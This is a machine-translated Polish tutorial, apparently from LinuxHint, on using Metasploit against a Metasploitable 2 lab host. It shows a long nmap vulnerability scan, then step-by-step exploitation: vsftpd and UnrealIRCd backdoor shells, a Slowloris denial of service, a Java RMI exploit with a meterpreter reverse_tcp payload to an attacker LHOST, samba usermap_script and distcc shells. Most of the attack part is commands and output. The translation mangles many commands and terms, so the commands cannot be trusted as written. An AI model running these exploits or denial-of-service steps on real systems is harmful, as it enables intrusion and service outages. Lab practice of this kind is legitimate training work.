W moim przypadku pobrałem bezpłatny proces Metasploit Pro, ale możesz zdobyć którykolwiek z nich.
Poniższy ekran będzie wymagał niektórych danych osobowych, wypełnij je, aby przejść do strony pobierania:
Pobierz Metasploit dla Linux:
Daj instalatorowi, że właśnie pobrałeś prawa do wykonania, uruchamiając:
# chmod +x metasploit-latest-linux-x64-installer.uruchomić
Następnie wykonaj Metasploit, uruchamiając:
# ./Metasploit-Latest-Linux-X64-installer.uruchomić
Jak widać instalator GUI, kliknij Do przodu kontynuować:
Na następnym ekranie zaakceptuj umowę licencyjną i kliknij Do przodu:
Zostaw domyślny katalog i naciśnij Do przodu:
Zapytany, czy do zainstalowania Metasploit jako usługi Zalecenie nie jest, jeśli to zrobisz, Metasploit Usługa rozpocznie się za każdym razem, gdy naciśniesz, jeśli naciśniesz NIE Usługa Metasploit zostanie uruchomiona tylko na Twoje żądanie. Wybierz swój wybór i naciśnij do przodu, aby kontynuować:
Aby uniknąć zakłóceń, podczas korzystania z metasploit wyłącz zaporę, naciśnij Do przodu kontynuować:
Chyba że pokazany port jest już używany, naciśnij Do przodu kontynuować:
Zostaw LocalHost i naciśnij Do przodu kontynuować:
Następnie kontynuować naciśnięcie instalacji Do przodu po raz ostatni:
Rozpocznie się proces instalacji:
Wreszcie, Metasploit został zainstalowany, pomimo faktu, że nie będziemy pracować z interfejsem internetowym Metasploit. Naciskać Skończyć do końca.
Rozwiązywanie problemów Metasploit DB Błąd:
W moim przypadku, gdy uruchomiłem Metasploit, zwrócił błąd:
Brak obsługi bazy danych: Nie można połączyć się z serwerem: Odrzucone połączenie to serwer działający na hoście „LocalHost” (:: 1) i akceptujący połączenia TCP/IP na porcie 7337?
Przyczyną tego błędu jest to, że zależność PostgreSQL nie została również zainstalowana i usługa metasploit.
Aby go rozwiązać, uruchom:
# apt Zainstaluj -y PostgreSQL
Następnie uruchom PostgreSQL, uruchamiając:
# usługa sudo postgresql start
I na koniec rozpocznij usługę Metasploit:
# Sudo Service Metasploit Start
Teraz biegnij msfconsole Znowu zauważysz, że błąd zniknął i jesteśmy gotowi zaatakować metasploitable 2:
Używanie metasploit do zeskanowania celu pod kątem luk:
Pierwszym krokiem jest zeskanowanie naszego celu, aby odkryć na nim usługi i luki. Aby to osiągnąć, użyjemy NMAP z Metasploit i jego NSE (Scripting Scripting Engine) Skrypt vuln używany do wykrywania luk:
# db_nmap -v -script vuln 192.168.0.184
NOTATKA: zastępować 192.168.0.184 Dla docelowego adresu IP lub hosta.
Przeanalizujmy wyjście NMAP:
WAŻNY: Wyjście NMAP zawierało ponad 4000 linii, dlatego wyjście zostało skrócone, pozostawiając odpowiednie informacje do wyjaśnienia.
Poniższe linie pokazują nam zainicjowane rodzaje skanów, które obejmują NSE, ARP Ping Scan, rozdzielczość DNS i skanowanie Syn Stealth. Wszystkie te kroki zostały już wyraźnie wyjaśnione na Linuxhint.com w skanowaniu ARP NPING i NMAP, używa.
Należy zauważyć, że NSE zawiera wstępne wykonywanie, podczas skanowania i skanowania po wydłużeniu, które działają przed, w trakcie i po rozpoczęciu i końce skanowania.
MSF5> db_nmap -v -Script vuln 192.168.0.184 [*] NMAP: Uruchamianie NMAP 7.70 (https: // nmap.org) na 2020-02-04 16:56 -03 [*] nmap: NSE: załadowane 103 skanowanie do skanowania. [*] NMAP: NSE: Skrypt wstępny. [*] Nmap: inicjowanie NSE o 16:56 [*] nmap: ukończony NSE o 16:57, 10.00S upłynął [*] nmap: inicjowanie NSE o 16:57 [*] nmap: ukończony NSE o 16:57, 0.00s upłynął [*] nmap: inicjowanie skanowania ping ARP o 16:57 [*] nmap: skanowanie 192.168.0.184 [1 port] [*] NMAP: zakończony skan ARP Ping o 16:57, 0.05S upłynęło (1 ogółem hostów) [*] NMAP: inicjowanie równoległych rozdzielczości DNS 1 hosta. o 16:57 [*] nmap: zakończona równoległa rozdzielczość DNS 1 hosta. o 16:57, 0.02S upłynął [*] NMAP: inicjowanie Syn Stealth Scan o 16:57 [*] NMAP: Skanowanie 192.168.0.184 [1000 portów]
Następny ekstrakt pokazuje, jakie usługi są dostępne w naszym celu:
[*] NMAP: Odkryty otwarty port 25/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 80/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 445/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 139/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 3306/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 5900/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 22/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 53/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 111/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 21/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 23/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 1099/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 512/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 1524/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 513/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 514/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 2121/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 6000/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 2049/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 6667/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 8009/TCP w 192.168.0.184 [*] NMAP: Odkryty otwarty port 5432/TCP na 192.168.0.184 [*] NMAP: Odkryty otwarty port 8180/TCP na 192.168.0.184 [*] NMAP: zakończony Syn Stealth Scan o 16:57, 0.Wyjdźli 12s (1000 portów)
Poniższy raport z wyciągu NSE Post Scan Scripts Wykonanie w celu znalezienia luk w zabezpieczeniach:
[*] NMAP: NSE: Script Scanning 192.168.0.184. [*] Nmap: inicjowanie NSE o 16:57 [*] nmap: ukończony NSE o 17:02, 322.44S upłynął [*] nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.74S upłynął [*] NMAP: raport skanowania NMAP za 192.168.0.184 [*] nmap: host jest w górę (0.Opóźnienie 00075s). [*] Nmap: nie pokazano: 977 zamknięte porty
Jak widać, NMAP znalazł już dziury bezpieczeństwa lub luki w docelowej usłudze FTP, nawet łączy nas exploits, aby zhakować cel:
[*] NMAP: Port State Service [*] nmap: 21/tcp Otwórz ftp [*] nmap: | FTP-VSFTPD-BACKDOOR: [*] NMAP: | Podatne: [*] nmap: | VSFTPD wersja 2.3.4 Backdoor [*] nmap: | Stan: wrażliwy (exploable) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD wersja 2.3.4 Backdoor, zostało to zgłoszone w 2011-07-04. [*] Nmap: | Data ujawnienia: 2011-07-03 [*] NMAP: | Wykorzystanie wyników: [*] nmap: | Polecenie powłoki: id [*] nmap: | Wyniki: uid = 0 (root) gid = 0 (root) [*] nmap: | Odniesienia: [*] nmap: | http: // ScarybeastSecurity.Blogspot.com/2011/07/alert-vsftpd-download-bardooded.html [*] nmap: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/Rapid7/metasploit-framework/blob/master/module/exploits/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2011-2523
Below you can see, additionally to FTP security holes, Nmap detected SSL vulnerabilities:
[*] Nmap: | _sslv2-Drown: [*] nmap: 22/tcp Open ssh [*] nmap: 23/tcp Open Telnet [*] nmap: 25/tcp Open SMTP [*] nmap: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ Serwer SMTP nie jest exim: nie wrażliwy [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Podatne: [*] nmap: | Anonimowa Diffie-Hellman Exchange MITM podatność [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które używają anonimowego [*] nmap: | Diffie-Hellman Exchange zapewnia jedynie ochronę przed pasywnym [*] nmap: | podsłuch i są podatni na aktywne ataki man-in-the-middle [*] nmap: | co może całkowicie zagrozić poufności i integralności [*] nmap: | wszelkich danych wymienionych w wyniku uzyskanej sesji. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Anonimowa grupa DH 1 [*] NMAP: | Cipher Suite: tls_dh_anon_with_aes_256_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: postfix wbudowany [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | https: // www.IETF.ORG/RFC/RFC2246.txt [*] nmap: | [*] Nmap: | Protokół bezpieczeństwa warstwy transportowej (TLS) DHE_EXPORT szyfrów obniżka MITM (logjam) [*] nmap: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Protokół bezpieczeństwa warstwy transportowej (TLS) zawiera wadę, jaką jest [*] nmap: | wyzwalane podczas obsługi giełd kluczy Diffie-Hellman zdefiniowanych za pomocą [*] nmap: | szyfr dhe_export. Może to pozwolić na atakującego Man-in-the-Middle [*] nmap: | Aby obniżyć bezpieczeństwo sesji TLS do 512-bitowej eksportu [*] NMAP: | Kryptografia, która jest znacznie słabsza, umożliwiając atakującemu [*] nmap: | Aby łatwiej złamać szyfrowanie i monitorować lub manipulować [*] nmap: | Szyfrowany strumień. [*] Nmap: | Data ujawnienia: 2015-5-19 [*] NMAP: | Sprawdź wyniki: [*] NMAP: | Eksportowa grupa DH 1 [*] NMAP: | Cipher Suite: tls_dhe_rsa_export_with_des40_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: nieznany/generowany na zamówienie [*] nmap: | Długość modułu: 512 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 512 [*] NMAP: | Odniesienia: [*] nmap: | https: // słabe.org [*] nmap: | http: // osvdb.ORG/122331 [*] NMAP: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2015-4000 [*] NMAP: | [*] Nmap: | Diffie-Hellman Exchange Exchange Insvysterpl Group Siły [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które korzystają z grup Diffie-Hellman [*] NMAP: | niewystarczającej siły, zwłaszcza tych, którzy używają jednego z kilku powszechnie [*] nmap: | Grupy wspólne, mogą być podatne na pasywne ataki podsłuchujące. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Słaba grupa DH 1 [*] nmap: | Cipher Suite: tls_dhe_rsa_with_des_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: postfix wbudowany [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | _ https: // słabe.org [*] nmap: | SSL-Poodle: [*] nmap: | Podatne: [*] nmap: | SSL Pudle Information wyciek [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Protokół SSL 3.0, stosowane w Openssl do 1.0.1i i inne [*] nmap: | Produkty, używa niedeterministycznego wyściółki CBC, co ułatwia [*] NMAP: | dla atakujących man-in-the-middle, aby uzyskać dane o cleartext za pośrednictwem [*] nmap: | Atak wyściółki, czyli problem „pudla”. [*] Nmap: | Data ujawnienia: 2014-10-14 [*] NMAP: | Sprawdź wyniki: [*] NMAP: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Odniesienia: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2014-3566 [*] nmap: | https: // www.Openssl.org/~ bodo/ssl-poodle.pdf [*] nmap: | https: // www.Imperialviolet.org/2014/10/14/pudle.html [*] nmap: | _ http: // osvdb.ORG/113251 [*] NMAP: | SSLV2-Drown: [*] nmap: | szyfry: [*] nmap: | SSL2_RC4_128_EXPORT40_WITH_MD5 [*] NMAP: | SSL2_DES_192_EDE3_CBC_WITH_MD5 [*] NMAP: | SSL2_RC2_128_CBC_WITH_MD5 [*] NMAP: | SSL2_RC2_128_CBC_EXPORT40_WITH_MD5 [*] NMAP: | SSL2_RC4_128_WITH_MD5 [*] NMAP: | SSL2_DES_64_CBC_WITH_MD5 [*] NMAP: | vulns: [*] nmap: | CVE-2016-0703: [*] nmap: | Tytuł: OpenSSL: Odzyskiwanie klucza sesji Divide and Conquer w SSLV2 [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: [*] nmap: | CVE: CVE-2016-0703 [*] NMAP: | Opis: [*] NMAP: | Funkcja get_client_master_key w s2_srvr.c Wdrożenie SSLV2 w [*] nmap: | OpenSsl przed 0.9.8zf, 1.0.0 przed 1.0.0r, 1.0.1 przed 1.0.1M i 1.0.2 Przed [*] nmap: | 1.0.2A przyjmuje niezerową wartość czystej klawiszu klienta dla dowolnej [*] NMAP: | szyfr, który umożliwia atakującym man-in-the-middle na określenie wartości mistrzowskiej [*] nmap: | i odszyfrować dane szyfrowania tls poprzez wykorzystanie wyściółki Bleichenbacher RSA, a [*] nmap: | Powiązany problem z CVE-2016-0800. [*] Nmap: | [*] Nmap: | Refs: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2016-0703 [*] nmap: | https: // www.Openssl.org/news/secadv/20160301.tekst
Poniższy ekstrakt pokazuje, że w serwisie internetowym znaleziono wiele luk w zabezpieczeniach, w tym dostęp do rozsądnych stron logowania i odmowa podatności na usługi.
[*] NMAP: 53/TCP Open Domena [*] nmap: 80/tcp Otwórz http [*] nmap: | http-csrf: [*] nmap: | Pająk ograniczony do: maxdepth = 3; maxpagecount = 20; wewnątrz Host = 192.168.0.184 [*] nmap: | Znalazłem następujące możliwe luki CSRF: [*] NMAP: | [*] Nmap: | Ścieżka: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | Identyfikator formularza: [*] nmap: | Forma Działanie: Zaloguj się.php [*] nmap: | [*] Nmap: | Ścieżka: http: // 192.168.0.184: 80/DVWA/Login.php [*] nmap: | Identyfikator formularza: [*] nmap: | _ Forma Działanie: Zaloguj się.php [*] nmap: | _http-dombased-xss: nie można znaleźć żadnego XSS opartych na DOM. [*] Nmap: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /test/: Strona testowa [*] nmap: | /phpinfo.PHP: możliwy plik informacji [*] nmap: | /phpMyAdmin/: phpMyAdmin [*] nmap: | /Doc/: potencjalnie interesujący katalog z listą „Apache/2.2.8 (Ubuntu) Dav/2 '[*] nmap: | /ikony/: potencjalnie interesujący folder z listą katalogu [*] nmap: | _/index/: potencjalnie interesujący folder [*] nmap: | Http-Slowloris-CHECK: [*] nmap: | Podatne: [*] nmap: | Atak Slowloris dos [*] nmap: | Stan: Prawdopodobnie wrażliwy [*] nmap: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris próbuje zachować wiele połączeń z docelowym serwerem WWW otwartym i trzymaj [*] nmap: | otwierają się tak długo, jak to możliwe. Osiąga to, otwierając połączenia z [*] nmap: | docelowy serwer WWW i wysyłanie częściowego żądania. W ten sposób głoduje [*] nmap: | zasoby serwera HTTP powodujące zaprzeczenie usługi. [*] Nmap: | [*] Nmap: | Data ujawnienia: 2009-09-17 [*] NMAP: | Odniesienia: [*] nmap: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2007-6750
Na tym etapie NMAP znalazł wiele luk wtrysku SQL, ilość luk w zabezpieczeniach była tak duża w tym samouczku, że usunęłem wiele z nich i zostawiłem:
[*] Nmap: | HTTP-SQL Indeption: [*] nmap: | Możliwe SQLI dla zapytań: [*] nmap: | http: // 192.168.0.184: 80/Dav/?C = n%3BO%3DD%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = S%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = M%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/Dav/?C = D%3BO%3DA%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = Test-Test-naok-hookup.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = dokumentacja%2Fvulneriless.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = Capture-Data.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = tekst-plik-viewer.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/MUTILLIDAE/?Strona = dodanie do-your-blogu.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/MUTILLIDAE/?strona = show-log.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = rejestracja.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = HTML5-STORAGE.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = użytkownik-info.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = dom.php & do = przełączniki%27%20OR%20SQLSPIDER [*] NMAP: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = show-log.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = notatki.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = kadrowanie.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?Strona = błąd php.php%27%20 lub 20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indeks.php?strona = dom.php i do = przełączanie bezpieczeństwa%27%20%%20SQLSPIDER
Poniżej NMAP ponownie odrzuca luki XSS (jak w pierwszym ekstrakcie) i raporty
Remote Metoda Invocation (RMI) Otwory bezpieczeństwa Zgoda z niewłaściwą konfiguracją umożliwiającą atakującemu umożliwienie złośliwego wykonywania kodu Java:
[*] Nmap: | _http-przechadza się-XSS: Nie można znaleźć żadnych zapisanych luk XSS. [*] Nmap: | _http-trace: śledzenie jest włączone [*] nmap: | _http-vuln-cve2017-1001000: błąd: wykonywanie skryptu nie powiodło się (użyj -d do debugowania) [*] nmap: 111/tcp Open RPCBind [ *] NMAP: 139/TCP Open Netbios-SSN [*] NMAP: 445/TCP Otwórz Microsoft-DD [*] NMAP: 512/TCP Open Exec [*] NMAP: 513/TCP Open Login [*] NMAP: 514/// TCP Open Shell [*] nmap: 1099/tcp Open rmiregistry [*] nmap: | RMI-vuln-Classloader: [*] nmap: | Podatne: [*] nmap: | Domyślna konfiguracja rejestru RMI Wykonanie kodu zdalnego wykonywania podatności [*] NMAP: | Stan: wrażliwy [*] nmap: | Domyślna konfiguracja rejestru RMI umożliwia ładowanie klas z zdalnych adresów URL, które mogą prowadzić do wykonania zdalnego kodu. [*] Nmap: | [*] Nmap: | Odniesienia: [*] nmap: | _ https: // github.com/Rapid7/metasploit-framework/blob/master/modules/exploits/multi/misp/java_rmi_server.RB
Poniżej można zobaczyć dodatkowe podatności SSL:
[*] Nmap: | SSL-CCS Indection: [*] nmap: | Podatne: [*] nmap: | SSL/TLS MITM podatność na podatność (CCS Inciction) [*] NMAP: | Stan: wrażliwy [*] nmap: | Współczynnik ryzyka: Wysoki [*] NMAP: | OpenSsl przed 0.9.8za, 1.0.0 przed 1.0.0m i 1.0.1 przed 1.0.1H [*] nmap: | nie ogranicza właściwie przetwarzania komunikatów ChangeCerSpec, [*] nmap: | który pozwala napastnikom man-wściekli na wyzwolenie używania zero [*] nmap: | Klucz główny długości w niektórych komunikacjach Openssl-Oopenssl i [*] nmap: | W konsekwencji porywa sesje lub uzyskaj poufne informacje, za pośrednictwem [*] nmap: | Wykonany uścisk dłoni TLS, czyli podatność „CCS Incection”. [*] Nmap: | [*] Nmap: | Odniesienia: [*] nmap: | https: // cve.mitra.org/cgi-bin/cVename.CGI?Nazwa = CVE-2014-0224 [*] nmap: | http: // www.CVEDETAILS.com/cve/2014-0224 [*] nmap: | _ http: // www.Openssl.org/news/secadv_20140605.txt [*] nmap: | SSL-DH-PARAMS: [*] NMAP: | Podatne: [*] nmap: | Diffie-Hellman Exchange Exchange Insvysterpl Group Siły [*] NMAP: | Stan: wrażliwy [*] nmap: | Usługi bezpieczeństwa warstwy transportowej (TLS), które korzystają z grup Diffie-Hellman [*] NMAP: | niewystarczającej siły, zwłaszcza tych, którzy używają jednego z kilku powszechnie [*] nmap: | Grupy wspólne, mogą być podatne na pasywne ataki podsłuchujące. [*] Nmap: | Sprawdź wyniki: [*] NMAP: | Słaba grupa DH 1 [*] nmap: | Cipher Suite: tls_dhe_rsa_with_aes_128_cbc_sha [*] nmap: | Moduł typ: bezpieczny prime [*] nmap: | Źródło modułu: nieznany/generowany na zamówienie [*] nmap: | Długość modułu: 1024 [*] nmap: | Długość generatora: 8 [*] nmap: | Długość klucza publicznego: 1024 [*] NMAP: | Odniesienia: [*] nmap: | _ https: // słabe.org [*] nmap: | SSL-Poodle: [*] nmap: | Podatne: [*] nmap: | SSL Pudle Information wyciek [*] NMAP: | Stan: wrażliwy [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Protokół SSL 3.0, stosowane w Openssl do 1.0.1i i inne
Następny ekstrakt pokazuje, że nasz cel jest prawdopodobnie zarażony trojanem przeciwko usłudze IRC:
[*] Nmap: | _IRC-UNREALIRCD-BACKDOOR: Wygląda jak trojanowana wersja Unrealircd. Zobacz http: // seklist.Org/FullDisCotuar/2010/Jun/277 [*] NMAP: 8009/TCP Open AJP13
Poniższy ekstrakt pokazuje, że flaga httponly nie jest odpowiednio skonfigurowana, dlatego cel jest podatny na ataki skryptów między witryną:
[*] NMAP: 8180/TCP Otwórz nieznany [*] nmap: | http-Cookie-Flags: [*] nmap: | /admin/: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/indeks.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/login.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/admin.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/konto.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionID: [*] nmap: | flaga httponly nie ustawiona [*] nmap: | /admin/dom.HTML:
Poniższy wyciąg wymieni lub wymienia interesujące znaleziono dostępne katalogi w naszym celu:
[*] Nmap: | http-enum: [*] nmap: | /admin/: możliwy folder administratora [*] nmap: | /admin/indeks.html: możliwy folder administratora [*] nmap: | /admin/login.html: możliwy folder administratora [*] nmap: | /admin/admin.html: możliwy folder administratora [*] nmap: | /admin/konto.html: możliwy folder administratora [*] nmap: | /admin/admin_login.html: możliwy folder administratora [*] nmap: | /admin/dom.html: możliwy folder administratora [*] nmap: | /admin/admin-login.html: możliwy folder administratora [*] nmap: | /admin/adminlogin.html: możliwy folder administratora [*] nmap: | /admin/controlpanel.html: możliwy folder administratora [*] nmap: | /admin/cp.html: możliwy folder administratora [*] nmap: | /admin/indeks.JSP: możliwy folder administratora
Wreszcie, skan kończy się i wykonuje się NSE po skanowaniu:
[*] Nmap: | [*] Nmap: | Data ujawnienia: 2009-09-17 [*] NMAP: | Odniesienia: [*] nmap: | http: // ha.Ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cVename.CGI?name = CVE-2007-6750 [*] nmap: MAC -MS10-054: false [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: Script Post-Scanning. [*] Nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.00S upłynął [*] nmap: inicjowanie NSE o 17:02 [*] nmap: ukończony nse o 17:02, 0.00S, które minęły [*] NMAP: Odczyt pliki danych z:/opt/metasploit/common/share/nmap/[*] nmap: NMAP wykonane: 1 adres IP (1 host w górę) zeskanowany w 333.96 sekund [*] NMAP: Surowe pakiety Wysłane: 1001 (44.028KB) | RCVD: 1001 (40.120KB) MSF5>
Teraz zidentyfikowaliśmy niektóre dziury bezpieczeństwa, aby zaatakować nasz cel.
Korzystanie z Metasploit do zhakowania serwera FTP:
Po zidentyfikowaniu otworów bezpieczeństwa w celu użycie poleceń Metasploit, aby znaleźć odpowiednie wykorzystywanie przeciwko nim. Jak wcześniej widziałeś, jeden z pierwszych znalezionej luki znajdował się na serwerze VSFTPD, aby znaleźć odpowiednie exploits, w Metasploit Run:
# Wyszukaj VSFTPD
Jak widzisz Metasploit zawiera backdoor, który może pomóc nam zhakować naszą docelową FTP. Aby użyć tego exploit, w Metasploit Run:
# Użyj exploit/unix/ftp/vsftpd_234_backdoor
Aby nauczyć się korzystać z dowolnego konkretnego uruchomienia exploit:
# Pokaż opcje
Jak widać powyżej, ten exploit zawiera 2 opcje, Rhosts (zdalny host) i RPOR. Musimy określić Rhost, port jest już określony (21).
Aby ustawić zdalny host (RHOST) definiujący docelowy bieg IP:
# Ustaw Rhost 192.168.0.184
Po zdefiniowaniu celu uruchom następujące polecenie, aby wykorzystać dziurę bezpieczeństwa:
# Exploit
Jak widać, dostałem skorupę do celu, kiedy uruchamiam „LS”, widzę pliki docelowe, atak się powiódł. Aby pozostawić cel, po prostu uruchom:
#Wyjście
Używanie metasploit do ataku DOS:
Jak widziałeś podczas procesu skanowania, znaleziono podatność na Dos Slowloris, aby znaleźć sposób, w jaki ją wykorzystać, wykonaj poprzednie kroki, aby wyszukać odpowiednie narzędzie, w tym przypadku moduł pomocniczy zamiast exploita:
# Wyszukaj slowloris
Po znalezieniu narzędzia do ataku, uruchom:
# Użyj pomocniczy/DOS/http/slowloris
# Ustaw Rhost 192.168.0.184
Wtedy po prostu wpisz:
# uruchomić
Zauważysz, że podczas działania ataku docelowa usługa HTTP nie będzie dostępna, ładuje się:
Kiedy zatrzymamy atak, naciskając KLAWISZ KONTROLNY+C Serwer będzie dostępny ponownie:
Korzystanie z Metasploit do zhakowania serwera IRC:
Internetowa czat przekaźnikowy jest szeroko stosowany na całym świecie, jak można było zauważyć na pierwszych etapach skanowania metasploit, który prawdopodobnie znalazł usługę IRC (Unreal IRCD) zarażoną trojanem.
Powtórzmy kroki, aby znaleźć narzędzie do zhakowania:
# Wyszukaj Unreal IRCD
# Użyj exploit/unix/irc/unreal_ircd_3281_backdoor
# Pokaż opcje
# Ustaw Rhost 192.168.0.184
Następnie uruchomić:
# Exploit
I jak widać ponownie, mamy sesję powłoki w celu.
Korzystanie z Metasploit do wykonania złośliwego kodu Java:
# Użyj exploit/multi/misc/java_rmi_server
# Pokaż opcje
# Ustaw Rhost 192.168.0.184
# Pokaż ładunki
# Ustaw obciążenie java/miernik/reverse_tcp
# Set lhost 192.168.0.50
# Exploit
Używanie metasploit do zhakowania przez podatność skryptu samba Usermap:
Niektóre kroki, takie jak wyszukiwanie exploitów, zostaną pominięte, aby uniknąć wielkiego samouczka. Aby wykorzystać tę podatność na podatność:
# Użyj exploit/multi/samba/usermap_script
# Pokaż opcje
Ustaw docelowy adres IP i wykorzystaj go, uruchamiając:
# Ustaw Rhost 192.168.0.184
# Exploit
Jak widać, zdobyliśmy skorupę w naszym celu.
Używanie Metasploit do wykorzystania wykonania polecenia Distcc Daemon:
Ta podatność jest tutaj wyjaśniona.
Aby rozpocząć bieg:
# Użyj exploit/unix/misc/distcc_exec
Następnie uruchomić:
# Ustaw Rhost 192.168.0.184
# Exploit
Jak widać, ponownie uzyskaliśmy dostęp do celu.
Korzystanie z metasploit do skanowania portów (dodatkowy sposób bez NMAP):
Przeprowadzanie skanowania TCP z Metasploit:
Aby uruchomić inny skan bez użycia NMAP Metasploit, oferuje alternatywy, które można znaleźć, uruchamiając:
# Wyszukaj portscan
Aby wykonać skanowanie TCP:
# Użyj skanera/portscan/tcp
# Ustaw Rhost 192.168.0.184
Aby zobaczyć dodatkowe opcje:
# Pokaż opcje
Wybierz zakres portów, który chcesz zeskanować, uruchamiając:
# Ustaw porty 21-35
Następnie uruchom skan, wykonując:
# uruchomić
Jak widać porty 22, 25,23 i 21, znaleziono otwarte.
Przeprowadzanie skanowania SYN z Metasploit:
W przypadku skanowania SYN:
# Użyj pomocniczego/skanera/portscan/syn
# Ustaw Rhost 192.168.0.184
# Ustaw porty 80
# uruchomić
Jak widać, port 80 został otwarty.
WNIOSEK
Metasploit jest jak szwajcarski nóż armii, ma tak wiele funkcji. Mam nadzieję, że ten samouczek nie znalazłeś przydatnego metasploit. Śledź śledź Linuxhint, aby uzyskać więcej wskazówek i aktualizacji na temat Linux i sieci.